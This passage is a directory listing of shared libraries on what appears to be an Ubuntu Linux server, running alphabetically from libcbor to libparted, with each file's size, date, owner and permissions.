February 20 2025 11:49:57
root
0644
libcbor.so.0.10
58.313 KB
March 31 2024 9:40:51
root
0644
libcbor.so.0.10.2
58.313 KB
March 31 2024 9:40:51
root
0644
libcbor.so.0.8
54.281 KB
January 20 2022 5:25:28
root
0644
libcbor.so.0.8.0
54.281 KB
January 20 2022 5:25:28
root
0644
libcc1.so.0
135.719 KB
September 09 2024 9:21:53
root
0644
libcc1.so.0.0.0
135.719 KB
September 09 2024 9:21:53
root
0644
libclang-18.so.1
32.95 MB
May 27 2024 4:26:20
root
0644
libclang-18.so.18
32.95 MB
May 27 2024 4:26:20
root
0644
libclang-cpp.so.18
61.79 MB
May 27 2024 4:26:20
root
0644
libclang-cpp.so.18.1
61.79 MB
May 27 2024 4:26:20
root
0644
libcom_err.so.2
18.07 KB
April 29 2024 7:44:46
root
0644
libcom_err.so.2.1
18.07 KB
April 29 2024 7:44:46
root
0644
libcrypt.a
265.043 KB
April 09 2024 12:09:21
root
0644
libcrypt.so
194.008 KB
April 09 2024 12:09:21
root
0644
libcrypt.so.1
194.008 KB
April 09 2024 12:09:21
root
0644
libcrypt.so.1.1.0
194.008 KB
April 09 2024 12:09:21
root
0644
libcrypto.a
9.55 MB
September 18 2025 7:12:48
root
0644
libcrypto.so
5.06 MB
September 18 2025 7:12:48
root
0644
libcrypto.so.3
5.06 MB
September 18 2025 7:12:48
root
0644
libcryptsetup.so.12
569.359 KB
November 14 2024 11:44:47
root
0644
libcryptsetup.so.12.10.0
569.359 KB
November 14 2024 11:44:47
root
0644
libctf-nobfd.so.0
211.031 KB
December 03 2025 11:01:20
root
0644
libctf-nobfd.so.0.0.0
211.031 KB
December 03 2025 11:01:20
root
0644
libctf.so.0
215.219 KB
December 03 2025 11:01:20
root
0644
libctf.so.0.0.0
215.219 KB
December 03 2025 11:01:20
root
0644
libcups.so.2
638.102 KB
December 03 2025 10:43:23
root
0644
libcurl-gnutls.so.3
747.906 KB
December 12 2024 12:44:19
root
0644
libcurl-gnutls.so.4
747.906 KB
December 12 2024 12:44:19
root
0644
libcurl-gnutls.so.4.8.0
747.906 KB
December 12 2024 12:44:19
root
0644
libcurl.so.4
767.906 KB
December 12 2024 12:44:19
root
0644
libcurl.so.4.8.0
767.906 KB
December 12 2024 12:44:19
root
0644
libdav1d.so.5
1.26 MB
September 12 2021 8:35:05
root
0644
libdav1d.so.5.1.1
1.26 MB
September 12 2021 8:35:05
root
0644
libdav1d.so.7
1.64 MB
March 31 2024 3:31:35
root
0644
libdav1d.so.7.0.0
1.64 MB
March 31 2024 3:31:35
root
0644
libdb-5.3.so
1.69 MB
April 13 2024 9:12:36
root
0644
libdbus-1.so.3
310.305 KB
August 09 2024 10:33:22
root
0644
libdbus-1.so.3.32.4
310.305 KB
August 09 2024 10:33:22
root
0644
libde265.so.0
350.344 KB
April 16 2024 3:09:53
root
0644
libde265.so.0.1.8
350.344 KB
April 16 2024 3:09:53
root
0644
libdebconfclient.so.0
14.188 KB
March 31 2024 3:29:25
root
0644
libdebconfclient.so.0.0.0
14.188 KB
March 31 2024 3:29:25
root
0644
libdeflate.so.0
74.031 KB
August 09 2024 10:33:21
root
0644
libdevmapper.so.1.02.1
428.445 KB
November 28 2024 3:06:49
root
0644
libdl.a
0.008 KB
September 17 2025 10:55:42
root
0644
libdl.so.2
14.07 KB
September 17 2025 10:55:42
root
0644
libdns-9.18.39-0ubuntu0.24.04.2-Ubuntu.so
2.09 MB
October 21 2025 8:33:24
root
0644
libdns-export.so.1110
2.16 MB
March 23 2022 5:43:16
root
0644
libdns-export.so.1110.0.2
2.16 MB
March 23 2022 5:43:16
root
0644
libdrm.so.2
86.586 KB
October 24 2025 10:48:33
root
0644
libdrm.so.2.4.0
86.586 KB
October 24 2025 10:48:33
root
0644
libdrop_ambient.so.0
14.078 KB
March 31 2024 3:45:22
root
0644
libdrop_ambient.so.0.0.0
14.078 KB
March 31 2024 3:45:22
root
0644
libduktape.so.207
298.07 KB
April 08 2024 11:56:50
root
0644
libdw-0.190.so
720.406 KB
March 18 2025 12:03:58
root
0644
libdw.so.1
720.406 KB
March 18 2025 12:03:58
root
0644
libe2p.so.2
44.109 KB
April 29 2024 7:44:46
root
0644
libe2p.so.2.3
44.109 KB
April 29 2024 7:44:46
root
0644
libedit.so.2
215.305 KB
April 09 2024 12:02:52
root
0644
libedit.so.2.0.72
215.305 KB
April 09 2024 12:02:52
root
0644
libefiboot.so.1
99.125 KB
March 31 2024 3:33:18
root
0644
libefiboot.so.1.38
99.125 KB
March 31 2024 3:33:18
root
0644
libefivar.so.1
195.172 KB
March 31 2024 3:33:18
root
0644
libefivar.so.1.38
195.172 KB
March 31 2024 3:33:18
root
0644
libelf-0.190.so
118.711 KB
March 18 2025 12:03:58
root
0644
libelf.so.1
118.711 KB
March 18 2025 12:03:58
root
0644
libestr.so.0
17.992 KB
April 09 2024 12:03:09
root
0644
libestr.so.0.0.0
17.992 KB
April 09 2024 12:03:09
root
0644
libevdev.so.2
114.203 KB
April 09 2024 12:03:19
root
0644
libevdev.so.2.3.0
114.203 KB
April 09 2024 12:03:19
root
0644
libevent_core-2.1.so.7
210.172 KB
March 31 2024 3:48:09
root
0644
libevent_core-2.1.so.7.0.1
210.172 KB
March 31 2024 3:48:09
root
0644
libevent_pthreads-2.1.so.7
13.922 KB
March 31 2024 3:48:09
root
0644
libevent_pthreads-2.1.so.7.0.1
13.922 KB
March 31 2024 3:48:09
root
0644
libexpat.so.1
170.25 KB
March 28 2025 3:06:29
root
0644
libexpat.so.1.9.1
170.25 KB
March 28 2025 3:06:29
root
0644
libexpatw.so.1
170.242 KB
March 28 2025 3:06:29
root
0644
libexpatw.so.1.9.1
170.242 KB
March 28 2025 3:06:29
root
0644
libexslt.so.0
94.156 KB
March 20 2025 12:53:59
root
0644
libexslt.so.0.8.21
94.156 KB
March 20 2025 12:53:59
root
0644
libext2fs.so.2
424.352 KB
April 29 2024 7:44:46
root
0644
libext2fs.so.2.4
424.352 KB
April 29 2024 7:44:46
root
0644
libfastjson.so.4
50.25 KB
April 09 2024 12:03:33
root
0644
libfastjson.so.4.3.0
50.25 KB
April 09 2024 12:03:33
root
0644
libfcgi++.so.0
22.164 KB
April 30 2025 4:36:00
root
0644
libfcgi++.so.0.0.0
22.164 KB
April 30 2025 4:36:00
root
0644
libfcgi.so.0
46.164 KB
April 30 2025 4:36:00
root
0644
libfcgi.so.0.0.0
46.164 KB
April 30 2025 4:36:00
root
0644
libfdisk.so.1
341.859 KB
June 05 2025 8:17:38
root
0644
libfdisk.so.1.1.0
341.859 KB
June 05 2025 8:17:38
root
0644
libffi.so.7
42.398 KB
February 05 2021 9:34:22
root
0644
libffi.so.7.1.0
42.398 KB
February 05 2021 9:34:22
root
0644
libffi.so.8
46.555 KB
April 09 2024 12:03:37
root
0644
libffi.so.8.1.4
46.555 KB
April 09 2024 12:03:37
root
0644
libfftw3.so.3
2.13 MB
March 31 2024 8:58:26
root
0644
libfftw3.so.3.6.10
2.13 MB
March 31 2024 8:58:26
root
0644
libfftw3_omp.so.3
30.07 KB
March 31 2024 8:58:26
root
0644
libfftw3_omp.so.3.6.10
30.07 KB
March 31 2024 8:58:26
root
0644
libfftw3_threads.so.3
34.07 KB
March 31 2024 8:58:26
root
0644
libfftw3_threads.so.3.6.10
34.07 KB
March 31 2024 8:58:26
root
0644
libfido2.so.1
214.063 KB
April 15 2024 6:20:52
root
0644
libfido2.so.1.14.0
214.063 KB
April 15 2024 6:20:52
root
0644
libfontconfig.so.1
318.078 KB
March 31 2024 8:59:34
root
0644
libfontconfig.so.1.12.1
318.078 KB
March 31 2024 8:59:34
root
0644
libfontenc.so.1
37.969 KB
March 31 2024 3:48:44
root
0644
libfontenc.so.1.0.0
37.969 KB
March 31 2024 3:48:44
root
0644
libform.so.6
67.453 KB
April 09 2024 12:14:03
root
0644
libform.so.6.4
67.453 KB
April 09 2024 12:14:03
root
0644
libformw.so.6
75.516 KB
April 09 2024 12:14:03
root
0644
libformw.so.6.4
75.516 KB
April 09 2024 12:14:03
root
0644
libfreetype.so.6
814.07 KB
March 31 2024 1:23:47
root
0644
libfreetype.so.6.20.1
814.07 KB
March 31 2024 1:23:47
root
0644
libfribidi.so.0
118.305 KB
April 08 2024 11:57:48
root
0644
libfribidi.so.0.4.0
118.305 KB
April 08 2024 11:57:48
root
0644
libfuse.so.2
254.273 KB
March 31 2024 1:27:22
root
0644
libfuse.so.2.9.9
254.273 KB
March 31 2024 1:27:22
root
0644
libfuse3.so.3
250.18 KB
April 08 2024 11:57:57
root
0644
libfuse3.so.3.14.0
250.18 KB
April 08 2024 11:57:57
root
0644
libg.a
1.182 KB
September 17 2025 10:55:42
root
0644
libgav1.so.0
862.156 KB
February 09 2022 6:40:10
root
0644
libgav1.so.0.0.1
862.156 KB
February 09 2022 6:40:10
root
0644
libgav1.so.1
930.164 KB
March 31 2024 3:48:51
root
0644
libgav1.so.1.0.0
930.164 KB
March 31 2024 3:48:51
root
0644
libgcc_s.so.1
178.734 KB
September 09 2024 9:21:53
root
0644
libgcrypt.so.20
1.28 MB
April 09 2024 12:03:56
root
0644
libgcrypt.so.20.4.3
1.28 MB
April 09 2024 12:03:56
root
0644
libgd.so.3
408.289 KB
April 27 2025 8:56:42
root
0644
libgd.so.3.0.11
408.289 KB
April 27 2025 8:56:42
root
0644
libgdbm.so.6
70.18 KB
March 31 2024 1:37:25
root
0644
libgdbm.so.6.0.0
70.18 KB
March 31 2024 1:37:25
root
0644
libgdbm_compat.so.4
13.992 KB
March 31 2024 1:37:25
root
0644
libgdbm_compat.so.4.0.0
13.992 KB
March 31 2024 1:37:25
root
0644
libgettextlib-0.21.so
242.5 KB
April 08 2024 11:58:30
root
0644
libgettextsrc-0.21.so
317.844 KB
April 08 2024 11:58:30
root
0644
libgio-2.0.so.0
1.8 MB
May 15 2025 8:06:49
root
0644
libgio-2.0.so.0.8000.0
1.8 MB
May 15 2025 8:06:49
root
0644
libgirepository-1.0.so.1
138.07 KB
April 01 2024 10:28:10
root
0644
libgirepository-1.0.so.1.0.0
138.07 KB
April 01 2024 10:28:10
root
0644
libglib-2.0.so.0
1.28 MB
May 15 2025 8:06:49
root
0644
libglib-2.0.so.0.8000.0
1.28 MB
May 15 2025 8:06:49
root
0644
libgmodule-2.0.so.0
22.203 KB
May 15 2025 8:06:49
root
0644
libgmodule-2.0.so.0.8000.0
22.203 KB
May 15 2025 8:06:49
root
0644
libgmp.so.10
522.359 KB
October 02 2024 8:40:51
root
0644
libgmp.so.10.5.0
522.359 KB
October 02 2024 8:40:51
root
0644
libgnutls.so.30
1.96 MB
July 11 2025 8:58:05
root
0644
libgnutls.so.30.37.1
1.96 MB
July 11 2025 8:58:05
root
0644
libgobject-2.0.so.0
390.383 KB
May 15 2025 8:06:49
root
0644
libgobject-2.0.so.0.8000.0
390.383 KB
May 15 2025 8:06:49
root
0644
libgomp.so.1
344.047 KB
September 09 2024 9:21:53
root
0644
libgomp.so.1.0.0
344.047 KB
September 09 2024 9:21:53
root
0644
libgpg-error.so.0
146.25 KB
October 02 2024 8:40:50
root
0644
libgpg-error.so.0.34.0
146.25 KB
October 02 2024 8:40:50
root
0644
libgpm.so.2
26.063 KB
March 13 2024 7:46:09
root
0644
libgprofng.so.0
2.23 MB
December 03 2025 11:01:20
root
0644
libgprofng.so.0.0.0
2.23 MB
December 03 2025 11:01:20
root
0644
libgs.so.10
23.92 MB
September 26 2025 12:37:20
root
0644
libgs.so.10.02
23.92 MB
September 26 2025 12:37:20
root
0644
libgssapi_krb5.so.2
330.758 KB
May 15 2025 4:09:20
root
0644
libgssapi_krb5.so.2.2
330.758 KB
May 15 2025 4:09:20
root
0644
libgstbase-1.0.so.0
529.461 KB
December 17 2024 8:53:48
root
0644
libgstbase-1.0.so.0.2402.0
529.461 KB
December 17 2024 8:53:48
root
0644
libgstcheck-1.0.so.0
152.93 KB
December 17 2024 8:53:48
root
0644
libgstcheck-1.0.so.0.2402.0
152.93 KB
December 17 2024 8:53:48
root
0644
libgstcontroller-1.0.so.0
75.039 KB
December 17 2024 8:53:48
root
0644
libgstcontroller-1.0.so.0.2402.0
75.039 KB
December 17 2024 8:53:48
root
0644
libgstnet-1.0.so.0
111.938 KB
December 17 2024 8:53:48
root
0644
libgstnet-1.0.so.0.2402.0
111.938 KB
December 17 2024 8:53:48
root
0644
libgstreamer-1.0.so.0
1.32 MB
December 17 2024 8:53:48
root
0644
libgstreamer-1.0.so.0.2402.0
1.32 MB
December 17 2024 8:53:48
root
0644
libgthread-2.0.so.0
14.148 KB
May 15 2025 8:06:49
root
0644
libgthread-2.0.so.0.8000.0
14.148 KB
May 15 2025 8:06:49
root
0644
libheif.so.1
766.563 KB
October 21 2024 6:48:55
root
0644
libheif.so.1.17.6
766.563 KB
October 21 2024 6:48:55
root
0644
libhistory.so.8
50.422 KB
March 31 2024 4:21:18
root
0644
libhistory.so.8.2
50.422 KB
March 31 2024 4:21:18
root
0644
libhogweed.so.6
282.148 KB
August 09 2024 10:33:22
root
0644
libhogweed.so.6.8
282.148 KB
August 09 2024 10:33:22
root
0644
libhwasan.so.0
4.73 MB
September 09 2024 9:21:53
root
0644
libhwasan.so.0.0.0
4.73 MB
September 09 2024 9:21:53
root
0644
libicudata.so.70
28.11 MB
November 04 2021 2:01:38
root
0644
libicudata.so.70.1
28.11 MB
November 04 2021 2:01:38
root
0644
libicudata.so.74
29.37 MB
August 09 2024 10:33:20
root
0644
libicudata.so.74.2
29.37 MB
August 09 2024 10:33:20
root
0644
libicui18n.so.70
3.17 MB
November 04 2021 2:01:38
root
0644
libicui18n.so.70.1
3.17 MB
November 04 2021 2:01:38
root
0644
libicui18n.so.74
3.3 MB
August 09 2024 10:33:20
root
0644
libicui18n.so.74.2
3.3 MB
August 09 2024 10:33:20
root
0644
libicuio.so.70
62.383 KB
November 04 2021 2:01:38
root
0644
libicuio.so.70.1
62.383 KB
November 04 2021 2:01:38
root
0644
libicuio.so.74
58.164 KB
August 09 2024 10:33:20
root
0644
libicuio.so.74.2
58.164 KB
August 09 2024 10:33:20
root
0644
libicutest.so.70
79.656 KB
November 04 2021 2:01:38
root
0644
libicutest.so.70.1
79.656 KB
November 04 2021 2:01:38
root
0644
libicutest.so.74
75.516 KB
August 09 2024 10:33:20
root
0644
libicutest.so.74.2
75.516 KB
August 09 2024 10:33:20
root
0644
libicutu.so.70
215.188 KB
November 04 2021 2:01:38
root
0644
libicutu.so.70.1
215.188 KB
November 04 2021 2:01:38
root
0644
libicutu.so.74
218.969 KB
August 09 2024 10:33:20
root
0644
libicutu.so.74.2
218.969 KB
August 09 2024 10:33:20
root
0644
libicuuc.so.70
1.97 MB
November 04 2021 2:01:38
root
0644
libicuuc.so.70.1
1.97 MB
November 04 2021 2:01:38
root
0644
libicuuc.so.74
2.04 MB
August 09 2024 10:33:20
root
0644
libicuuc.so.74.2
2.04 MB
August 09 2024 10:33:20
root
0644
libidn.so.12
206.18 KB
April 09 2024 12:04:25
root
0644
libidn.so.12.6.5
206.18 KB
April 09 2024 12:04:25
root
0644
libidn2.so.0
130.07 KB
October 02 2024 8:40:50
root
0644
libidn2.so.0.4.0
130.07 KB
October 02 2024 8:40:50
root
0644
libijs-0.35.so
26.383 KB
April 08 2024 11:59:27
root
0644
libimagequant.so.0
65.992 KB
April 09 2024 12:04:36
root
0644
libip4tc.so.2
34.609 KB
April 08 2024 11:59:59
root
0644
libip4tc.so.2.0.0
34.609 KB
April 08 2024 11:59:59
root
0644
libip6tc.so.2
34.609 KB
April 08 2024 11:59:59
root
0644
libip6tc.so.2.0.0
34.609 KB
April 08 2024 11:59:59
root
0644
libirs-9.18.39-0ubuntu0.24.04.2-Ubuntu.so
18.148 KB
October 21 2025 8:33:24
root
0644
libisc-9.18.39-0ubuntu0.24.04.2-Ubuntu.so
583.109 KB
October 21 2025 8:33:24
root
0644
libisc-export.so.1105
464.617 KB
March 23 2022 5:43:16
root
0644
libisc-export.so.1105.0.2
464.617 KB
March 23 2022 5:43:16
root
0644
libisccc-9.18.39-0ubuntu0.24.04.2-Ubuntu.so
38.453 KB
October 21 2025 8:33:24
root
0644
libisccfg-9.18.39-0ubuntu0.24.04.2-Ubuntu.so
215.859 KB
October 21 2025 8:33:24
root
0644
libisl.so.23
1.78 MB
October 02 2024 8:40:50
root
0644
libisl.so.23.3.0
1.78 MB
October 02 2024 8:40:50
root
0644
libitm.so.1
98.602 KB
September 09 2024 9:21:53
root
0644
libitm.so.1.0.0
98.602 KB
September 09 2024 9:21:53
root
0644
libjansson.so.4
62.508 KB
March 31 2024 9:26:06
root
0644
libjansson.so.4.14.0
62.508 KB
March 31 2024 9:26:06
root
0644
libjbig.so.0
64.844 KB
April 09 2024 12:00:28
root
0644
libjbig2dec.so.0
118.344 KB
March 31 2024 3:40:24
root
0644
libjbig2dec.so.0.0.0
118.344 KB
March 31 2024 3:40:24
root
0644
libjemalloc.so.2
811.188 KB
April 19 2024 1:55:52
root
0644
libjpeg.so.8
522.063 KB
April 09 2024 12:04:50
root
0644
libjpeg.so.8.2.2
522.063 KB
April 09 2024 12:04:50
root
0644
libjson-c.so.5
74.383 KB
April 09 2024 12:00:48
root
0644
libjson-c.so.5.3.0
74.383 KB
April 09 2024 12:00:48
root
0644
libk5crypto.so.3
174.461 KB
May 15 2025 4:09:20
root
0644
libk5crypto.so.3.1
174.461 KB
May 15 2025 4:09:20
root
0644
libkeyutils.so.1
22.07 KB
April 09 2024 12:00:56
root
0644
libkeyutils.so.1.10
22.07 KB
April 09 2024 12:00:56
root
0644
libkmod.so.2
110.148 KB
October 02 2024 8:40:49
root
0644
libkmod.so.2.4.1
110.148 KB
October 02 2024 8:40:49
root
0644
libkrb5.so.3
804.188 KB
May 15 2025 4:09:20
root
0644
libkrb5.so.3.3
804.188 KB
May 15 2025 4:09:20
root
0644
libkrb5support.so.0
46.781 KB
May 15 2025 4:09:20
root
0644
libkrb5support.so.0.1
46.781 KB
May 15 2025 4:09:20
root
0644
libksba.so.8
266.172 KB
March 31 2024 10:05:33
root
0644
libksba.so.8.14.6
266.172 KB
March 31 2024 10:05:33
root
0644
liblber-2.5.so.0
62.492 KB
April 22 2025 7:42:05
root
0644
liblber-2.5.so.0.1.14
62.492 KB
April 22 2025 7:42:05
root
0644
liblber.so.2
58.484 KB
December 09 2024 10:50:18
root
0644
liblber.so.2.0.200
58.484 KB
December 09 2024 10:50:18
root
0644
liblcms2.so.2
385.109 KB
April 09 2024 12:01:07
root
0644
liblcms2.so.2.0.14
385.109 KB
April 09 2024 12:01:07
root
0644
libldap-2.5.so.0
371.688 KB
April 22 2025 7:42:05
root
0644
libldap-2.5.so.0.1.14
371.688 KB
April 22 2025 7:42:05
root
0644
libldap.so.2
363.672 KB
December 09 2024 10:50:18
root
0644
libldap.so.2.0.200
363.672 KB
December 09 2024 10:50:18
root
0644
liblmdb.so.0
90.07 KB
April 09 2024 12:11:23
root
0644
liblmdb.so.0.0.0
90.07 KB
April 09 2024 12:11:23
root
0644
liblqr-1.so.0
54.133 KB
March 31 2024 3:52:26
root
0644
liblqr-1.so.0.3.2
54.133 KB
March 31 2024 3:52:26
root
0644
liblsan.so.0
3.72 MB
September 09 2024 9:21:53
root
0644
liblsan.so.0.0.0
3.72 MB
September 09 2024 9:21:53
root
0644
libltdl.a
60.586 KB
April 09 2024 12:07:55
root
0644
libltdl.so
38.445 KB
April 09 2024 12:07:55
root
0644
libltdl.so.7
38.445 KB
April 09 2024 12:07:55
root
0644
libltdl.so.7.3.2
38.445 KB
April 09 2024 12:07:55
root
0644
liblua5.1-bitop.so.0
14.375 KB
January 27 2023 8:47:53
root
0644
liblua5.1-bitop.so.0.0.0
14.375 KB
January 27 2023 8:47:53
root
0644
liblua5.1-c++.so.0
203.867 KB
April 01 2024 3:59:58
root
0644
liblua5.1-c++.so.0.0.0
203.867 KB
April 01 2024 3:59:58
root
0644
liblua5.1-cjson.so.0
34.313 KB
December 01 2022 12:26:18
root
0644
liblua5.1-cjson.so.0.0.0
34.313 KB
December 01 2022 12:26:18
root
0644
liblua5.1.so.0
199.766 KB
April 01 2024 3:59:58
root
0644
liblua5.1.so.0.0.0
199.766 KB
April 01 2024 3:59:58
root
0644
liblua5.2-bitop.so.0
14.367 KB
January 27 2023 8:47:53
root
0644
liblua5.2-bitop.so.0.0.0
14.367 KB
January 27 2023 8:47:53
root
0644
liblua5.2-cjson.so.0
34.313 KB
December 01 2022 12:26:18
root
0644
liblua5.2-cjson.so.0.0.0
34.313 KB
December 01 2022 12:26:18
root
0644
liblua5.3-bitop.so.0
14.375 KB
January 27 2023 8:47:53
root
0644
liblua5.3-bitop.so.0.0.0
14.375 KB
January 27 2023 8:47:53
root
0644
liblua5.3-c++.so.0
243.008 KB
March 31 2024 4:03:43
root
0644
liblua5.3-c++.so.0.0.0
243.008 KB
March 31 2024 4:03:43
root
0644
liblua5.3-cjson.so.0
34.313 KB
December 01 2022 12:26:18
root
0644
liblua5.3-cjson.so.0.0.0
34.313 KB
December 01 2022 12:26:18
root
0644
liblua5.3.so.0
234.906 KB
March 31 2024 4:03:43
root
0644
liblua5.3.so.0.0.0
234.906 KB
March 31 2024 4:03:43
root
0644
liblua5.4-bitop.so.0
14.375 KB
January 27 2023 8:47:53
root
0644
liblua5.4-bitop.so.0.0.0
14.375 KB
January 27 2023 8:47:53
root
0644
liblua5.4-c++.so.0
267.164 KB
March 31 2024 4:03:50
root
0644
liblua5.4-c++.so.0.0.0
267.164 KB
March 31 2024 4:03:50
root
0644
liblua5.4-cjson.so.0
34.313 KB
December 01 2022 12:26:18
root
0644
liblua5.4-cjson.so.0.0.0
34.313 KB
December 01 2022 12:26:18
root
0644
liblua5.4.so.0
259.063 KB
March 31 2024 4:03:50
root
0644
liblua5.4.so.0.0.0
259.063 KB
March 31 2024 4:03:50
root
0644
liblz4.so.1
134.219 KB
August 09 2024 10:33:21
root
0644
liblz4.so.1.9.4
134.219 KB
August 09 2024 10:33:21
root
0644
liblzf.so.1
17.992 KB
June 28 2023 5:08:47
root
0644
liblzf.so.1.5
17.992 KB
June 28 2023 5:08:47
root
0644
liblzma.so.5
198.148 KB
April 01 2025 2:22:22
root
0644
liblzma.so.5.4.5
198.148 KB
April 01 2025 2:22:22
root
0644
libm-2.39.a
2.49 MB
September 17 2025 10:55:42
root
0644
libm.a
0.129 KB
September 17 2025 10:55:42
root
0644
libm.so
0.137 KB
September 17 2025 10:55:42
root
0644
libm.so.6
930.289 KB
September 17 2025 10:55:42
root
0644
libmagic.so.1
166.367 KB
March 31 2024 3:35:22
root
0644
libmagic.so.1.0.0
166.367 KB
March 31 2024 3:35:22
root
0644
libmaxminddb.so.0
21.992 KB
April 09 2024 12:05:12
root
0644
libmaxminddb.so.0.0.7
21.992 KB
April 09 2024 12:05:12
root
0644
libmcheck.a
1.445 KB
September 17 2025 10:55:42
root
0644
libmd.so.0
54.234 KB
October 02 2024 8:40:50
root
0644
libmd.so.0.1.0
54.234 KB
October 02 2024 8:40:50
root
0644
libmecab.so.2
830.281 KB
March 31 2024 10:33:30
root
0644
libmecab.so.2.0.0
830.281 KB
March 31 2024 10:33:30
root
0644
libmemusage.so
18.273 KB
September 17 2025 10:55:42
root
0644
libmenu.so.6
42.555 KB
April 09 2024 12:14:03
root
0644
libmenu.so.6.4
42.555 KB
April 09 2024 12:14:03
root
0644
libmenuw.so.6
42.555 KB
April 09 2024 12:14:03
root
0644
libmenuw.so.6.4
42.555 KB
April 09 2024 12:14:03
root
0644
libmnl.so.0
26.148 KB
April 09 2024 12:05:22
root
0644
libmnl.so.0.2.0
26.148 KB
April 09 2024 12:05:22
root
0644
libmount.so.1
302.695 KB
June 05 2025 8:17:38
root
0644
libmount.so.1.1.0
302.695 KB
June 05 2025 8:17:38
root
0644
libmpc.so.3
131.289 KB
October 02 2024 8:40:51
root
0644
libmpc.so.3.3.1
131.289 KB
October 02 2024 8:40:51
root
0644
libmpdec++.so.2.5.1
38.75 KB
March 25 2022 12:17:10
root
0644
libmpdec++.so.3
38.75 KB
March 25 2022 12:17:10
root
0644
libmpdec.so.2.5.1
182.813 KB
March 25 2022 12:17:10
root
0644
libmpdec.so.3
182.813 KB
March 25 2022 12:17:10
root
0644
libmpfr.so.6
742.641 KB
October 02 2024 8:40:52
root
0644
libmpfr.so.6.2.1
742.641 KB
October 02 2024 8:40:52
root
0644
libmvec.a
1.75 MB
September 17 2025 10:55:42
root
0644
libmvec.so
994.281 KB
September 17 2025 10:55:42
root
0644
libmvec.so.1
994.281 KB
September 17 2025 10:55:42
root
0644
libncurses.so.6
162.078 KB
April 09 2024 12:14:03
root
0644
libncurses.so.6.4
162.078 KB
April 09 2024 12:14:03
root
0644
libncursesw.so.6
234.227 KB
April 09 2024 12:14:03
root
0644
libncursesw.so.6.4
234.227 KB
April 09 2024 12:14:03
root
0644
libnetfilter_conntrack.so.3
121.633 KB
April 09 2024 12:05:42
root
0644
libnetfilter_conntrack.so.3.8.0
121.633 KB
April 09 2024 12:05:42
root
0644
libnetplan.so.0.0
298.758 KB
June 29 2024 1:12:13
root
0644
libnetplan.so.1
346.07 KB
April 17 2025 11:46:08
root
0644
libnettle.so.8
334.258 KB
August 09 2024 10:33:22
root
0644
libnettle.so.8.8
334.258 KB
August 09 2024 10:33:22
root
0644
libnewt.so.0.52
99.594 KB
March 31 2024 4:10:06
root
0644
libnewt.so.0.52.24
99.594 KB
March 31 2024 4:10:06
root
0644
libnfnetlink.so.0
33.578 KB
April 09 2024 12:05:44
root
0644
libnfnetlink.so.0.2.0
33.578 KB
April 09 2024 12:05:44
root
0644
libnftables.so.1
953.141 KB
April 09 2024 12:14:26
root
0644
libnftables.so.1.1.0
953.141 KB
April 09 2024 12:14:26
root
0644
libnftnl.so.11
198.836 KB
April 09 2024 12:05:58
root
0644
libnftnl.so.11.6.0
198.836 KB
April 09 2024 12:05:58
root
0644
libnghttp2.so.14
166.359 KB
October 02 2024 8:40:49
root
0644
libnghttp2.so.14.26.0
166.359 KB
October 02 2024 8:40:49
root
0644
libnl-3.so.200
130.805 KB
October 02 2024 8:40:51
root
0644
libnl-3.so.200.26.0
130.805 KB
October 02 2024 8:40:51
root
0644
libnl-genl-3.so.200
27.328 KB
October 02 2024 8:40:51
root
0644
libnl-genl-3.so.200.26.0
27.328 KB
October 02 2024 8:40:51
root
0644
libnpth.so.0
22.5 KB
March 31 2024 10:41:01
root
0644
libnpth.so.0.1.2
22.5 KB
March 31 2024 10:41:01
root
0644
libns-9.18.39-0ubuntu0.24.04.2-Ubuntu.so
313.039 KB
October 21 2025 8:33:24
root
0644
libnsl.a
204.855 KB
March 31 2024 3:53:46
root
0644
libnsl.so
91.086 KB
March 31 2024 3:53:46
root
0644
libnsl.so.1
98.281 KB
September 17 2025 10:55:42
root
0644
libnsl.so.2
91.086 KB
March 31 2024 3:53:46
root
0644
libnsl.so.2.0.1
91.086 KB
March 31 2024 3:53:46
root
0644
libnss_compat.so
42.711 KB
September 17 2025 10:55:42
root
0644
libnss_compat.so.2
42.711 KB
September 17 2025 10:55:42
root
0644
libnss_dns.so.2
14 KB
September 17 2025 10:55:42
root
0644
libnss_files.so.2
14 KB
September 17 2025 10:55:42
root
0644
libnss_hesiod.so
26.281 KB
September 17 2025 10:55:42
root
0644
libnss_hesiod.so.2
26.281 KB
September 17 2025 10:55:42
root
0644
libnss_nis.so.2
54.5 KB
April 22 2024 6:43:03
root
0644
libnss_nis.so.2.0.0
54.5 KB
April 22 2024 6:43:03
root
0644
libnss_nisplus.so.2
54.484 KB
April 01 2024 3:22:49
root
0644
libnss_nisplus.so.2.0.0
54.484 KB
April 01 2024 3:22:49
root
0644
libnss_systemd.so.2
362.414 KB
July 12 2025 2:52:59
root
0644
libntfs-3g.so.89
326.625 KB
April 08 2024 10:46:29
root
0644
libntfs-3g.so.89.0.0
326.625 KB
April 08 2024 10:46:29
root
0644
libnuma.so.1
51.023 KB
April 09 2024 12:14:45
root
0644
libnuma.so.1.0.0
51.023 KB
April 09 2024 12:14:45
root
0644
libonig.so.5
599.813 KB
April 09 2024 12:06:15
root
0644
libonig.so.5.4.0
599.813 KB
April 09 2024 12:06:15
root
0644
libopcodes-2.42-system.so
890.289 KB
December 03 2025 11:01:20
root
0644
libopenjp2.so.2.5.0
382.469 KB
September 17 2025 11:10:22
root
0644
libopenjp2.so.7
382.469 KB
September 17 2025 11:10:22
root
0644
libp11-kit.so.0
1.63 MB
August 09 2024 10:33:21
root
0644
libp11-kit.so.0.3.1
1.63 MB
August 09 2024 10:33:21
root
0644
libpackagekit-glib2.so.18
396.516 KB
October 09 2025 5:00:52
root
0644
libpackagekit-glib2.so.18.1.3
396.516 KB
October 09 2025 5:00:52
root
0644
libpam.so.0
66.297 KB
September 15 2025 8:37:15
root
0644
libpam.so.0.85.1
66.297 KB
September 15 2025 8:37:15
root
0644
libpam_misc.so.0
22.242 KB
September 15 2025 8:37:15
root
0644
libpam_misc.so.0.82.1
22.242 KB
September 15 2025 8:37:15
root
0644
libpamc.so.0
22.219 KB
September 15 2025 8:37:15
root
0644
libpamc.so.0.82.1
22.219 KB
September 15 2025 8:37:15
root
0644
libpanel.so.6
22.156 KB
April 09 2024 12:14:03
root
0644
libpanel.so.6.4
22.156 KB
April 09 2024 12:14:03
root
0644
libpanelw.so.6
22.156 KB
April 09 2024 12:14:03
root
0644
libpanelw.so.6.4
22.156 KB
April 09 2024 12:14:03
root
0644
libpaper.so.1
19.602 KB
April 09 2024 12:06:21
root
0644
libpaper.so.1.1.2
19.602 KB
April 09 2024 12:06:21
root
0644
libparted.so.2
312.625 KB
March 31 2024 2:44:32
root
0644
libparted.so.2.0.5
312.625 KB
March 31 2024 2:44:32
root
